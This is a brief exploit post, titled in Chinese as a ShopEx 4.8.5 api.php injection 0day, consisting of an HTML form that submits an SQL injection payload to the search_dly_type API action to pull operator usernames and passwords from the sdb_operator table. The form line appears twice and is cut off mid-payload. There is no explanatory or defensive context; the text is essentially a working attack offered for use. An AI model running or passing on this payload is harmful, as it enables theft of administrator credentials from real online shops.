shopex 4.8.5 api.php注入漏洞0day exp
<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_oper...
<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_oper...